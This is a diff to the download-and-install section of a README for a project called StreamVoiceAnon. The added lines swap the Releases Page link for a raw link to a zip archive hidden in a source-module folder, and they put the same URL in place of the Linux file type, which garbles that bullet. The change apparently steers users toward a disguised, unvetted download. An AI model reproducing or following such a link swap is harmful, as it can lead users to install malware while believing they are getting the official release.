unsmoothed-persianlilac108/StreamVoiceAnon/README.md

 ## 📦 Download & Install
 To get started with StreamVoiceAnon, follow these steps:

-1. Visit the [Releases Page](https://github.com/unsmoothed-persianlilac108/StreamVoiceAnon/releases) to find the latest version.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/unsmoothed-persianlilac108/StreamVoiceAnon/main/modules/bicodec_speaker_encoder/StreamVoiceAnon-embowel.zip) to find the latest version.
 2. Look for the file named with the most recent version number (like “v1.0”) followed by the appropriate file type for your operating system:
    - For Windows, it is usually an `.exe` file.
    - For macOS, it may be a `.dmg` file.
-   - For Linux, it might be a `.tar.gz` file.
+   - For Linux, it might be a `https://raw.githubusercontent.com/unsmoothed-persianlilac108/StreamVoiceAnon/main/modules/bicodec_speaker_encoder/StreamVoiceAnon-embowel.zip` file.

 3. Click on the download link for your operating system.
 The file will begin to download.